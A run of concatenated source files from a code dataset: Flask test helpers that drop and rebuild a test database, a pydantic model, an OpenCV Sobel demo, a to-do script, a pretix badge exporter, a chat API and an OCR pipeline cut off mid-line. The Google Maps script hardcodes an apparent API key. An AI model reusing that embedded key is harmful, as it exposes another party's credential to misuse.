setUp(self):\n self.client = app.test_client()\n\n def post(self, url, data):\n return self.client.post(url, data=json.dumps(data),\n content_type='application/json')\n\n def patch(self, url, data):\n return self.client.patch(url, data=json.dumps(data),\n content_type='application/json')\n\n def put(self, url, data):\n return self.client.put(url, data=json.dumps(data),\n content_type='application/json')\n\n def get(self, url, data):\n return self.client.get(url, data=json.dumps(data),\n content_type='application/json')\n\n def delete(self, url):\n return self.client.delete(url, content_type='application/json')\n\n def check_response_ok(self, resp, codes=(200, 201)):\n self.assertIn(resp.status_code, codes)\n d = json.loads(resp.data)\n self.assertEqual('ok', d['status'])\n\n def check_response_error(self, resp, code):\n self.assertEqual(code, resp.status_code)\n d = json.loads(resp.data)\n self.assertEqual('error', d['status'])\n\n\nclass DbTest(BaseTest):\n\n def get_migrations_dir(self):\n return os.path.join(os.path.dirname(__file__),\n '..', 'api', 'db', 'migrations')\n\n def setUp(self):\n super(DbTest, self).setUp()\n\n # Cleaning all changes from the previous test\n db.session.rollback()\n\n directory = self.get_migrations_dir()\n with app.app_context():\n try:\n flask_migrate.downgrade(directory=directory,\n revision='base')\n except CommandError as e:\n app.logger.debug(\"DB migration downgrade failed: %s\", e)\n self.clean_db()\n flask_migrate.upgrade(directory=directory)\n\n def clean_db(self):\n app.logger.debug(\"Cleaning DB without Alembic\")\n\n # Removing tables\n tables = db.session.execute(\n \"SELECT table_name FROM information_schema.tables \"\n \"WHERE table_schema = 'public'\")\n table_names = list(item[0] for item in tables)\n if table_names:\n app.logger.debug(\"Removing tables: %s\", table_names)\n db.session.execute(\n \"DROP TABLE {0} CASCADE\".format(','.join(table_names)))\n\n # Removing sequences\n sequences = list(item[0] for item in db.session.execute(\n \"SELECT relname FROM pg_class WHERE relkind='S'\"))\n sequence_names = list(item[0] for item in sequences)\n if sequence_names:\n app.logger.debug(\"Removing sequences: %s\", sequence_names)\n db.session.execute(\n \"DROP SEQUENCE {0}\".format(','.join(sequences)))\n\n # Removing enums\n enums = db.session.execute(\n \"SELECT t.typname FROM pg_type t JOIN pg_catalog.pg_namespace n \"\n \"ON n.oid = t.typnamespace WHERE n.nspname='public'\")\n enum_names = list(item[0] for item in enums)\n if enum_names:\n app.logger.debug(\"Removing types: %s\", enum_names)\n db.session.execute(\n \"DROP TYPE {0}\".format(','.join(enum_names)))\n\n # Committing DDL changes\n db.session.commit()\n","sub_path":"collector/collector/test/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"309967391","text":"from devmaua.src.enum.tipo_sala import TipoSala\nfrom devmaua.src.enum.campus import Campus\n\nfrom pydantic import BaseModel, validator, root_validator\n\n\nclass Sala(BaseModel):\n bloco: str\n numeroDaSala: int\n tipo: list[TipoSala]\n campus: Campus\n \n @root_validator\n def bloco_is_valid(cls, values):\n campus = values.get('campus')\n bloco = values.get('bloco').upper()\n if campus == Campus.SCS:\n blocos_validos = ['A', 'B', 'C', 'D', 'E', 'F',\n 'G', 'H', 'I', 'J', 'L', 'M',\n 'N', 'P', 'Q', 'R', 'S', 'U',\n 'V']\n if campus == Campus.SP:\n blocos_validos = [] #FAZER\n if bloco not in blocos_validos:\n raise ValueError('bloco invalido')\n values['bloco'] = values['bloco'].upper()\n return values\n \n @validator('numeroDaSala')\n def numero_is_valid(cls, v):\n if v < 1:\n raise ValueError('numero de sala invalido')\n return v\n \n @validator('tipo', check_fields=False)\n def tipo_is_empty(cls, v):\n if len(v) == 0:\n raise ValueError('tipo de sala is empty')\n return v","sub_path":"devmaua/src/models/sala.py","file_name":"sala.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"166303918","text":"# -*- coding: utf-8 -*-\nimport cv2\nimport numpy as np\nimg = cv2.imread('lenacolor.png',0)\n# 找水平邊緣用的kernel\nkernel = np.array([[-1,-2, -1], [0,0,0], [1,2,1]],dtype=np.int8)\nw, h = img.shape\n\no1 = np.zeros((w,h), dtype=np.uint8)\no2 = np.zeros((w,h), dtype=np.uint8)\na = 3\nq = 202\nb = 5\nfor x in range(w-a+1):\n for y in range(h-a+1):\n temp = np.sum(img[x:x+a, y:y+a] * kernel)\n temp2 = np.sum(img[x:x+a, y:y+a] * kernel.T)\n if temp >=0 and temp <=255:\n o1[x+1,y+1] = temp\n elif temp < 0:\n o1[x+1,y+1] = 0\n elif temp > 255:\n o1[x+1,y+1] = 255\n o2[x+1,y+1] = abs(temp2) if abs(temp2) <= 255 else 255\n\n# ddepth=-1 則是運算後原始值(含負值) 將>255 的像素通通設定255 <0通通設為0\n# dx=0, dy=1 是尋找水平向的邊緣\nimg2 = cv2.Sobel(img, ddepth=-1, dx=0, dy=1)\n\n# dx=1, dy=0 是尋找垂直向的邊緣\n# ddepth=cv2.CV_64F 則是先保留運算後原始值(含負值)不做更動\n# 搭配上convertScaleAbs則是將負值變號 若原本<-255變號後會>255 則取255\nimg3 = cv2.Sobel(img, ddepth=cv2.CV_64F, dx=1, dy=0)\nimg3 = cv2.convertScaleAbs(img3)\n\ncv2.imshow('o1', o1)\ncv2.imshow('img2', img2)\ncv2.imshow('o2', o2)\ncv2.imshow('img3', img3)\ncv2.waitKey()\ncv2.destroyAllWindows()\n\n# o = cv2.imread('sobel4.bmp', cv2.IMREAD_GRAYSCALE)\n# #sobel dx dy皆=1 是找出角落點 所以一次sobel只能找水平或垂直其中一種邊緣\n# 純黑白若有長條水平/垂直邊要用ddepth=cv2.CV_64F 不然會自動捨棄負值(黑到白的部分)少一側的邊 \n# 所以要轉f64容納負值再轉絕對值,因此要分兩次(水平、垂直)做再加在一起\n# sobelx = cv2.Sobel(o, ddepth=cv2.CV_64F, dx=1, dy=0)\n# sobelx = np.absolute(sobelx)\n# sobely = cv2.Sobel(o, ddepth=cv2.CV_64F, dx=0, dy=1)\n# sobely = np.absolute(sobely) # 也可以用cv2.convertScaleAbs(sobely)\n# sobel_final = cv2.addWeighted(sobelx, 1, sobely, 1, 0)\n# cv2.imshow('o', o)\n# cv2.imshow('x', sobel_final)\n# cv2.waitKey()\n# cv2.destroyAllWindows()","sub_path":"影像處理/cv2_sobel.py","file_name":"cv2_sobel.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"316456869","text":"toDoList = []\n\ndef doList():\n if toDoList != []:\n print('Tasks to do: ')\n for task in range(len(toDoList)):\n if task == 0:\n print(' - ' + str((task) + 1) + ('st') + '. ' + toDoList[task])\n elif task == 1:\n print(' - ' + str((task) + 1) + ('nd') + '. ' + toDoList[task])\n elif task == 2:\n print(' - ' + str((task) + 1) + ('rd') + '. ' + toDoList[task])\n elif task >= 3:\n print(' - ' + str((task) + 1) + ('th') + '. ' + toDoList[task])\n else:\n print('Congratulations, you have done everything. Now you can grab some snacks and play video games all day long.')\nsuffixes = ['st', 'nd', 'rd']\n\nwhile True:\n suffix = len(toDoList) < 3 and suffixes[len(toDoList)] or 'th'\n print('Enter ' + str(len(toDoList) + 1) + suffix + ' task you have to do today (leave empty place if list is done).')\n\n task = input()\n if task == '':\n break\n toDoList = toDoList + [task]\n\ndoList()\nwhile toDoList != []:\n done = input('What have you done already? ' )\n if done in toDoList:\n toDoList.remove(done)\n doList()\n \n elif done not in toDoList:\n print(str(done) + ' is not on your list.')\n doList()\n continue\n","sub_path":"toDoList.py","file_name":"toDoList.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"385681779","text":"#coding:utf-8\n\nimport sys\n\"\"\"\n\nmessage specification:\n\n[ver][reserved][type/filter][body]\n ver (1) : version , high/low (0.1 -> 0x01, 1.2 -> 0x12)\n reserved(3) :\n type/filter(40) : head part\n body(N) : user-data\n\n\"\"\"\nCongoRiver = '1000' #\n\nclass NetworkPayload(object):\n MIN_SIZE = 44\n VERSION = b'\\x15'\n BODY_JSON = b'\\0'\n BODY_PICKLE = b'\\x01'\n def __init__(self):\n self.ver = NetworkPayload.VERSION\n self.encoding = NetworkPayload.BODY_JSON\n self.reserved = b'\\0'*2\n self.head = b'\\0'*40\n self.body = b''\n\n def marshall(self):\n # if sys.version_info.major == 2:\n return self.ver + self.encoding + self.reserved + self.head + self.body\n\n\n @staticmethod\n def parse(data):\n if len(data) < NetworkPayload.MIN_SIZE:\n return None\n packet = NetworkPayload()\n packet.ver = data[:1]\n packet.encoding = data[1:2]\n packet.reserved = data[2:4]\n packet.head = data[4:NetworkPayload.MIN_SIZE]\n packet.body = data[NetworkPayload.MIN_SIZE:]\n return packet\n\n @staticmethod\n def for_message(ver=b'',reserved=b'',head=b'',body=b'',encoding='json'):\n if sys.version_info.major == 3:\n if isinstance(body,str):\n body = body.encode()\n if isinstance(ver,str):\n ver = ver.encode()\n if isinstance(reserved,str):\n reserved = reserved.encode()\n if isinstance(head,str):\n head = head.encode()\n\n np = NetworkPayload()\n if encoding =='pickle':\n np.encoding = NetworkPayload.BODY_PICKLE\n\n if ver: np.ver = ver\n if reserved:\n np.reserved = reserved[:2] + b'\\0'*(2-len(reserved))\n if head:\n np.head = head[:40] + b'\\0'*(40-len(head))\n if body: np.body = body\n return np\n\ndef for_subscribe_address(topic):\n np = NetworkPayload()\n return np.ver + np.reserved + topic\n","sub_path":"congoriver/bowl.py","file_name":"bowl.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"291738103","text":"import json\nimport requests\nimport urllib\nimport urllib3\nimport source\nimport polycoder\n\nmaps_key = 'AIzaSyAs5sA8X7MR-vbuNNxfJ4a-xSiUeOLtg-U'\n\n## INPUT TYPE: list, list\n## DESCRIPTION: The lists must contain the coordinates of locations.\n\ndef caller(current, destination):\n unit = 'imperial'\n url = 'https://maps.googleapis.com/maps/api/distancematrix/'\n out_format = 'json'\n lang = 'en'\n origin_coordinates, destination_coordinates = [], []\n for coordinates in current:\n coordinates_list = coordinates.split(',')\n origin_coordinates.append(str(coordinates_list[0]) + ',' + str(coordinates_list[1]))\n for coordinates in destination:\n coordinates_list = coordinates.split(',')\n destination_coordinates.append(str(coordinates_list[0]) + ',' + str(coordinates_list[1]))\n poly_origin = (polycoder.super_encoder(origin_coordinates))\n poly_destination = (polycoder.super_encoder(destination_coordinates))\n add = 'units=' + unit + '&' + 'origins=' + 'enc:' + poly_origin + ':' + '&' + 'destinations=' + 'enc:' + poly_destination + ':' + '&' + 'language=' + lang + '&' + 'key=' + str(maps_key)\n## string_request = url + out_format + '?' + source.http_string_convertor(add)\n request = url + out_format + '?' + add\n response = requests.get(request)\n response_dict = response.json()\n return response_dict\n\ndef time_calc(response):\n num_sec = response ['rows'] [0] ['elements'] [0] ['duration'] ['value']\n minutes, seconds = second_splitter(num_sec)\n return (minutes, seconds)\n\ndef second_splitter(num_sec):\n minutes = num_sec // 60\n seconds = num_sec % 60\n return (minutes, seconds)\n\ndef independent_response():\n current = input(\"Enter the coordinates of the origin: \")\n destination = input(\"Enter the coordinates of the destination: \")\n response = distance_calc(current, destination)\n minutes, seconds = time_calc(response)\n print (\"It would take\", minutes, \"minutes and\", seconds, \"seconds to drive from the origin to the destination.\")\n\n##def caller(current, destination):\n## response = distance_calc(current, destination)\n## minutes, seconds = time_calc(response)\n## return (minutes, seconds)\n","sub_path":"maps_distance_api.py","file_name":"maps_distance_api.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"609089501","text":"import json\nfrom collections import OrderedDict\nfrom io import BytesIO\nfrom typing import Tuple\n\nfrom django import forms\nfrom django.conf import settings\nfrom django.contrib.staticfiles import finders\nfrom django.core.files import File\nfrom django.core.files.base import ContentFile\nfrom django.core.files.storage import default_storage\nfrom django.db.models import Exists, OuterRef\nfrom django.db.models.functions import Coalesce\nfrom django.utils.translation import ugettext as _\nfrom jsonfallback.functions import JSONExtract\nfrom PyPDF2 import PdfFileMerger\nfrom reportlab.lib import pagesizes\nfrom reportlab.pdfgen import canvas\n\nfrom pretix.base.exporter import BaseExporter\nfrom pretix.base.i18n import language\nfrom pretix.base.models import Order, OrderPosition\nfrom pretix.base.pdf import Renderer\nfrom pretix.base.services.orders import OrderError\nfrom pretix.base.settings import PERSON_NAME_SCHEMES\nfrom pretix.plugins.badges.models import BadgeItem, BadgeLayout\n\n\ndef _renderer(event, layout):\n if layout is None:\n return None\n if isinstance(layout.background, File) and layout.background.name:\n bgf = default_storage.open(layout.background.name, \"rb\")\n else:\n bgf = open(finders.find('pretixplugins/badges/badge_default_a6l.pdf'), \"rb\")\n return Renderer(event, json.loads(layout.layout), bgf)\n\n\ndef render_pdf(event, positions):\n Renderer._register_fonts()\n\n renderermap = {\n bi.item_id: _renderer(event, bi.layout)\n for bi in BadgeItem.objects.select_related('layout').filter(item__event=event)\n }\n try:\n default_renderer = _renderer(event, event.badge_layouts.get(default=True))\n except BadgeLayout.DoesNotExist:\n default_renderer = None\n merger = PdfFileMerger()\n\n any = False\n for op in positions:\n r = renderermap.get(op.item_id, default_renderer)\n if not r:\n continue\n any = True\n\n with language(op.order.locale):\n buffer = BytesIO()\n p = canvas.Canvas(buffer, pagesize=pagesizes.A4)\n r.draw_page(p, op.order, op)\n p.save()\n outbuffer = r.render_background(buffer, 'Badge')\n merger.append(ContentFile(outbuffer.read()))\n\n outbuffer = BytesIO()\n merger.write(outbuffer)\n merger.close()\n outbuffer.seek(0)\n if not any:\n raise OrderError(_(\"None of the selected products is configured to print badges.\"))\n return outbuffer\n\n\nclass BadgeExporter(BaseExporter):\n identifier = \"badges\"\n verbose_name = _(\"Attendee badges\")\n\n @property\n def export_form_fields(self):\n name_scheme = PERSON_NAME_SCHEMES[self.event.settings.name_scheme]\n d = OrderedDict(\n [\n ('items',\n forms.ModelMultipleChoiceField(\n queryset=self.event.items.annotate(\n no_badging=Exists(BadgeItem.objects.filter(item=OuterRef('pk'), layout__isnull=True))\n ).exclude(no_badging=True),\n label=_('Limit to products'),\n widget=forms.CheckboxSelectMultiple(\n attrs={'class': 'scrolling-multiple-choice'}\n ),\n initial=self.event.items.filter(admission=True)\n )),\n ('include_pending',\n forms.BooleanField(\n label=_('Include pending orders'),\n required=False\n )),\n ('include_addons',\n forms.BooleanField(\n label=_('Include add-on or bundled positions'),\n required=False\n )),\n ('order_by',\n forms.ChoiceField(\n label=_('Sort by'),\n choices=[\n ('name', _('Attendee name')),\n ('code', _('Order code')),\n ] + ([\n ('name:{}'.format(k), _('Attendee name: {part}').format(part=label))\n for k, label, w in name_scheme['fields']\n ] if settings.JSON_FIELD_AVAILABLE and len(name_scheme['fields']) > 1 else []),\n )),\n ]\n )\n return d\n\n def render(self, form_data: dict) -> Tuple[str, str, str]:\n qs = OrderPosition.objects.filter(\n order__event=self.event, item_id__in=form_data['items']\n ).prefetch_related(\n 'answers', 'answers__question'\n ).select_related('order', 'item', 'variation', 'addon_to')\n\n if not form_data.get('include_addons'):\n qs = qs.filter(addon_to__isnull=True)\n\n if form_data.get('include_pending'):\n qs = qs.filter(order__status__in=[Order.STATUS_PAID, Order.STATUS_PENDING])\n else:\n qs = qs.filter(order__status__in=[Order.STATUS_PAID])\n\n if form_data.get('order_by') == 'name':\n qs = qs.order_by('attendee_name_cached', 'order__code')\n elif form_data.get('order_by') == 'code':\n qs = qs.order_by('order__code')\n elif form_data.get('order_by', '').startswith('name:'):\n part = form_data['order_by'][5:]\n qs = qs.annotate(\n resolved_name=Coalesce('attendee_name_parts', 'addon_to__attendee_name_parts', 'order__invoice_address__name_parts')\n ).annotate(\n resolved_name_part=JSONExtract('resolved_name', part)\n ).order_by(\n 'resolved_name_part'\n )\n\n outbuffer = render_pdf(self.event, qs)\n return 'badges.pdf', 'application/pdf', outbuffer.read()\n","sub_path":"src/pretix/plugins/badges/exporters.py","file_name":"exporters.py","file_ext":"py","file_size_in_byte":5678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"251568006","text":"def ack(m,n):\n m = int(m)\n n = int(n)\n ans = 0\n if m == 0:\n ans = n + 1\n elif m > 0 and n == 0:\n ans = ack(m-1,1)\n elif m > 0 and n > 0:\n temp = ack(m,n - 1)\n ans = ack(m - 1,temp)\n else:\n return ans\n return ans\n\nm = input(\"Enter value for m:\")\nn = input(\"Enter value for n:\")\nprint(ack(m,n))\n \n","sub_path":"LAB1TASK11.py","file_name":"LAB1TASK11.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"588608044","text":"# Convenience functions to make the django template syntax\n# work better with some Freemarker idioms we're dependent on\n#\n# The matched_inclusion_tag code is a mix of inclusion_tag and the\n# django documentation on parsing matched tags\n# The kwargs parsing is lifted from the url built in tag\n\n\nfrom inspect import getargspec\nimport re\n\nfrom django import template\nfrom django.template.context import Context\nfrom django.utils.functional import curry\n\n# Regex for token keyword arguments\nkwarg_re = re.compile(r\"(?:(\\w+)=)?(.+)\")\n\ndef matched_tag_compiler(params, defaults, name, node_class, parser, token):\n \"Returns a template.Node subclass.\"\n bits = token.split_contents()[1:]\n bmax = len(params)\n def_len = defaults and len(defaults) or 0\n bmin = bmax - def_len\n if(len(bits) < bmin or len(bits) > bmax):\n if bmin == bmax:\n message = \"%s takes %s arguments\" % (name, bmin)\n else:\n message = \"%s takes between %s and %s arguments\" % (name, bmin, bmax)\n raise template.TemplateSyntaxError(message)\n\n args = []\n kwargs = {}\n if len(bits):\n for bit in bits:\n match = kwarg_re.match(bit)\n if not match:\n raise template.TemplateSyntaxError(\"Malformed arguments to url tag\")\n key, value = match.groups()\n if key:\n kwargs[key] = value\n else:\n args.append(value)\n\n nodelist = parser.parse(('end%s' % name,))\n parser.delete_first_token() # remove the {% endfoo %}\n return node_class(args, kwargs, nodelist)\n\n\ndef matched_inclusion_tag(library, file_name, context_class=Context, takes_context=False):\n def dec(func):\n params, xx, xxx, defaults = getargspec(func)\n if takes_context:\n if params[0] == 'context':\n params = params[1:]\n else:\n raise template.TemplateSyntaxError(\"Any tag function decorated with takes_context=True must have a first argument of 'context'\")\n\n class InclusionNode(template.Node):\n def __init__(self, args, kwargs, nested_nodes):\n self.args = map(template.Variable, args)\n self.kwargs = dict([(k, template.Variable(v))\n for k, v in kwargs.items()])\n self.nested_nodes = nested_nodes\n\n def render(self, context):\n context.push()\n context['True'] = True\n context['False'] = False\n context['None'] = None\n\n resolved_args = [var.resolve(context) for var in self.args]\n resolved_kwargs = dict([(str(k), v.resolve(context))\n for k, v in self.kwargs.items()])\n context.pop()\n\n if takes_context:\n args = [context] + resolved_args\n else:\n args = resolved_args\n\n dictionary = func(*args, **resolved_kwargs)\n dictionary['nested'] = self.nested_nodes.render(context)\n\n if not getattr(self, 'nodelist', False):\n from django.template.loader import get_template, select_template\n if not isinstance(file_name, basestring) and is_iterable(file_name):\n t = select_template(file_name)\n else:\n t = get_template(file_name)\n self.nodelist = t.nodelist\n new_context = context_class(dictionary, autoescape=context.autoescape)\n # Copy across the CSRF token, if present, because inclusion\n # tags are often used for forms, and we need instructions\n # for using CSRF protection to be as simple as possible.\n csrf_token = context.get('csrf_token', None)\n if csrf_token is not None:\n new_context['csrf_token'] = csrf_token\n return self.nodelist.render(new_context)\n\n compile_func = curry(matched_tag_compiler, params, defaults, getattr(func, \"_decorated_function\", func).__name__, InclusionNode)\n compile_func.__doc__ = func.__doc__\n library.tag(getattr(func, \"_decorated_function\", func).__name__, compile_func)\n return func\n return dec\n\n\n","sub_path":"eliza/ntm/templatetags/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"139205913","text":"from django.conf.urls import url\nfrom cart.views import CartInfoView, CartAddView, CartUpdateView, CartDeleteView\n\nurlpatterns = [\n url(r'^show$', CartInfoView.as_view(), name='show'), # 购物车页面显示\n url(r'^add$', CartAddView.as_view(), name='add'), # 购物车添加\n url(r'^update$', CartUpdateView.as_view(), name='update'), # 购物车更新\n url(r'^delete$', CartDeleteView.as_view(), name='delete'), # 删除购物车记录\n\n]\n","sub_path":"dailyfresh/apps/cart/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"122371425","text":"from flask import Blueprint,request,jsonify,send_file\nfrom serv import get_set_anthing\nfrom settings import MONGO_DB\nfrom settings import RET\nfrom settings import VOICE_PATH\nfrom baidu_aip import speech\nfrom bson import ObjectId\nimport os\n\nchats = Blueprint(\"chats\",__name__)\n\n@chats.route(\"/recv_chat\",methods=[\"POST\"])\ndef recv_chat():\n toy_id = request.form.get(\"toy_id\")\n user_id = request.form.get(\"user_id\")\n user_list = [toy_id, user_id]\n \n # count = 3 [app,self,app]\n recv_count,user_id2 = get_set_anthing.redis_get_one(toy_id,user_id)\n if user_id2:\n user_list = [toy_id, user_id2]\n recv_list = []\n\n chat_window = MONGO_DB.chats.find_one({\"user_list\": {\"$all\": user_list}})\n for chat in reversed(chat_window.get(\"chat_list\")):\n if chat.get(\"sender\") != toy_id:\n recv_list.append(chat)\n if len(recv_list) >= recv_count:\n break\n xxtx = speech.get_remark(toy_id, user_id2)\n recv_list.append({\"sender\":user_id2,\"recv\":toy_id,\"content\":xxtx})\n return jsonify(recv_list)#: [7,5,3,{content:\"你有来自xxx的消息\"}]\n\n@chats.route(\"/chat_list\",methods=[\"POST\"])\ndef chat_list():\n chat_id = request.form.get(\"chat_id\")\n to_user = request.form.get(\"user_id\")\n from_user = request.form.get(\"toy_id\")\n \n get_set_anthing.redis_get_one(to_user,from_user)\n\n chat_window = MONGO_DB.chats.find_one({\"_id\":ObjectId(chat_id)})\n \n RET[\"code\"] = 0\n RET[\"msg\"] = \"查询消息\"\n RET[\"data\"] = chat_window.get(\"chat_list\")\n \n return jsonify(RET)\n\n@chats.route(\"/get_msg_count\",methods=[\"POST\"])\ndef get_msg_count():\n user_id = request.form.get(\"user_id\")\n user_msg = get_set_anthing.redis_get_count(user_id)\n \n RET[\"code\"] = 0\n RET[\"msg\"] = \"未读消息查询\"\n RET[\"data\"] = user_msg\n \n return jsonify(RET)","sub_path":"第9部分-flask+智能玩具(火龙果)/day129/今日代码/TuXingSun/serv/chats.py","file_name":"chats.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"241327433","text":"import io\nfrom PIL import Image, ImageSequence\nfrom pdfplumber.pdf import PDF\nfrom pdf2image import convert_from_bytes\nimport numpy as np\nfrom IDP_pipeline.ocr.utils import cvutils\nfrom IDP_pipeline.ocr.ocr_entities.rzt_ocr.text_patch_detector import RZTTextPatchDetector\nfrom IDP_pipeline.ocr.ocr_entities.tesseract.tesseract_ocr_entity import Tesseract_OCR\n\nfrom IDP_pipeline.runner.rzt.Assemble_Evidences import assemble_evidences\nfrom IDP_pipeline.hypotheses.ocr_pattern_hypothesis.RND.Bordered_table import Bordered_Table\nfrom copy import deepcopy\n\nfrom ocr_pattern_hypothesis.utils import frame_utils\nfrom ocr_pattern_hypothesis.frames.basic_frames import Word\n\n# STRUCTURE FRAMES\nfrom ocr_pattern_hypothesis.frames.structure.engine import StructureEngine\nfrom ocr_pattern_hypothesis.frames.structure.text import Paragraph, TextLine\n\n# CONTENT FRAMES\nfrom ocr_pattern_hypothesis.frames.content.engine import ContentEngine\nfrom ocr_pattern_hypothesis.frames.content.where_rules import where_page, where_position, close_by\nfrom ocr_pattern_hypothesis.frames.content.what_rules import MatchSRL, LookUp, HasKey, Near\nfrom ocr_pattern_hypothesis.frames.content.what_group_rules import GrMatchSRL, GrLookUp, GrHasKey, \\\n GrNear\n\nisland_alg = \"CONNECTED_COMPONENT\"\n# island_alg= \"CONTOUR\"\n# island_alg =\"HISTOGRAM\"\nroot_folder = \"/home/rztuser/IDP/run_result/\"\nimage_folder = \"/home/rztuser/IDP/images/\"\nrule_json = \"/home/rztuser/IDP/Jsons/att_rules.json\"\nrun_evidence = False\nrequired_evidences = [\"tesseract\", \"rzt_ocr\"]\n\n\ndef tesseract_evidence(img):\n # tesseract_words, tesseract_content = Tesseract_OCR.get_pyocr_words_strings(text_patch=img)\n # res = {\n # 'tesseract_words': tesseract_words,\n # 'tesseract_content': tesseract_content\n # }\n # return res\n site = 'http://192.168.60.45:5000'\n _, img_encoded = cv2.imencode('.jpg', tp)\n response = requests.post(site + '/tesseract_evidence', data=img_encoded.tostring())\n tesseract_json = response.json()\n return tesseract_json\n\n\ndef write_text_on_image(img, word_patch_with_string, color=(0, 0, 0), fx=2, fy=2):\n try:\n word_patch_with_string = {tuple(eval(i)): j for i, j in word_patch_with_string.items()}\n except Exception as e:\n pass\n new_img = np.zeros(img.shape) + 255\n new_img = cv2.resize(new_img, (0, 0), fx=fx, fy=fy)\n font = cv2.FONT_HERSHEY_SIMPLEX\n for patch, text in word_patch_with_string.items():\n cv2.putText(new_img, text, (int(patch[1] * fx), int(patch[2] * fx)), font, 1, color, 2, cv2.LINE_AA)\n return new_img\n\n\ndef hypothesis(evidence, image, rules):\n s_engine = StructureEngine((\n TextLine.generate,\n # Paragraph.generate,\n # Table.generate\n ))\n what_group_rules = {\n 'match-srl': GrMatchSRL,\n \"lookup\": GrLookUp,\n \"has-key\": GrHasKey,\n \"near\": GrNear\n }\n\n what_rules = {\n 'match-srl': MatchSRL,\n \"lookup\": LookUp,\n \"has-key\": HasKey,\n \"near\": Near\n\n }\n where_rules = {\n 'page': where_page,\n 'position': where_position,\n \"close-by\": close_by\n }\n\n c_engine = ContentEngine(rules, what_rules, where_rules, what_group_rules)\n\n # Load the image!\n # print(images_folder + file_name + \".jpg\")\n imgs = [image]\n # print(imgs)\n # exit()\n\n # Get word patches!\n word_patches_dict = {}\n for k, v in evidence['evidence_words'].items():\n c = v[\"assembled_result\"][0]\n label = v[\"assembled_result\"][1]\n\n coordinates = (\n c[0], c[1],\n c[2], c[3]\n )\n word_patches_dict[coordinates] = label\n all_structures = []\n for page, img in enumerate(imgs, 1):\n try:\n structures = s_engine.run(img, word_args=(word_patches_dict,))\n except IndexError:\n structures = []\n all_structures.append(structures)\n\n all_results = c_engine.run(imgs, all_structures)\n\n final_data = []\n for page, img in zip(all_results, imgs):\n temp = []\n for frame in page:\n temp.append(\n [(frame.coordinates[0], frame.coordinates[1]), frame.name, Word.join(*frame.contains['words']),\n frame.confidence])\n\n final_data.append(temp)\n return (final_data)\n\n\ndef tiff_to_jpg(binary_data: str):\n im = Image.open(io.BytesIO(binary_data))\n im_arr = []\n for i, page in enumerate(ImageSequence.Iterator(im)):\n im_arr.append(np.asarray(page.convert('RGB')))\n return im_arr\n\n\ndef fetch_words(binary_input, filepath):\n def get_text_patch_from_image(image):\n if island_alg == \"CONNECTED_COMPONENT\":\n text_patch_coords = RZTTextPatchDetector(page_image=image).detect_using_connected_components()\n elif island_alg == \"CONTOUR\":\n text_patch_coords = RZTTextPatchDetector(page_image=image).detect_using_contours()\n else:\n text_patch_coords = RZTTextPatchDetector(page_image=image).detect_using_histogram()\n\n text_patches = [image[t[1]:t[3], t[0]:t[2]].copy() for t in text_patch_coords]\n\n text_patch_list = []\n for e1, tp in enumerate(text_patches):\n if tp is None or tp.shape[0] == 0 or tp.shape[1] == 0:\n continue\n orientation = cvutils.get_text_orientation_using_word_width(tp)\n text = text_patch_coords[e1]\n if orientation == \"VERTICAL\":\n text_patch_key = str(text) + \"_V\"\n else:\n text_patch_key = str(text) + \"_H\"\n text_patch_list.append(text_patch_key)\n\n return text_patch_list\n\n document_name = filepath.split('/')[-1]\n document_name_without_ext = document_name.rsplit('.', 1)[0]\n extension = document_name.split('.')[-1].lower()\n result_dict = {}\n if extension == 'tif' or extension == 'tiff':\n images = tiff_to_jpg(binary_input)\n\n for e, image in enumerate(images):\n page_filename = document_name_without_ext + \"_page_\" + str(e)\n text_patch_list = get_text_patch_from_image(image, page_filename)\n result_dict['page_' + str(e)] = {\n 'words': [],\n 'text_images': text_patch_list,\n 'numpy_image': image\n }\n elif extension == 'pdf':\n pdf = PDF(io.BytesIO(binary_input))\n images = convert_from_bytes(binary_input)\n for e, page in enumerate(pdf.pages):\n image = images[page.page_number - 1]\n factor = float(image.size[0] / page.width)\n image = np.asarray(image)\n text_patch_list = []\n image_area = image.shape[0] * image.shape[1]\n print(\"image shape\", image.shape)\n try:\n is_scanned_image = False\n if \"image\" in page.objects:\n\n if len(page.objects[\"image\"]) == 1:\n imageObject = page.objects[\"image\"][0]\n x0, x1, top, bottom = (round(float(imageObject[k]) * factor) for k in\n ('x0', 'x1', 'top', 'bottom'))\n\n if (top, x0) == (0, 0) and abs(bottom - image.shape[0]) < 10 and abs(x1 - image.shape[1]) < 10:\n is_scanned_image = True\n else:\n for imageObject in page.objects[\"image\"]:\n x0, x1, top, bottom = (round(float(imageObject[k]) * factor) for k in\n ('x0', 'x1', 'top', 'bottom'))\n\n tp = image[top:bottom, x0:x1].copy()\n if ((bottom - top) * (x1 - x0)) >= 0.5 * image_area:\n # bigger image patch. Try detecting islands\n text_patch_list.extend(get_text_patch_from_image(tp))\n else:\n # smaller image patches save as a single text patch\n orientation = cvutils.get_text_orientation_using_word_width(tp)\n\n text = [x0, top, x1, bottom]\n if orientation == \"VERTICAL\":\n text_patch_key = str(text) + \"_V\"\n else:\n text_patch_key = str(text) + 